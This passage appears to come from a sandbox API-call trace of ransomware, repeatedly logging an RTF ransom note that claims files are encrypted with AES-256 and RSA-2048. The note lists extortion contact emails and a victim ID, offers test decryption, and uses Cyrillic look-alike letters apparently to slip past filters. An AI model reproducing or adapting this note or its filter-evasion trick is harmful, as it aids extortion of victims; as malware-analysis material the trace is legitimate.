imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t 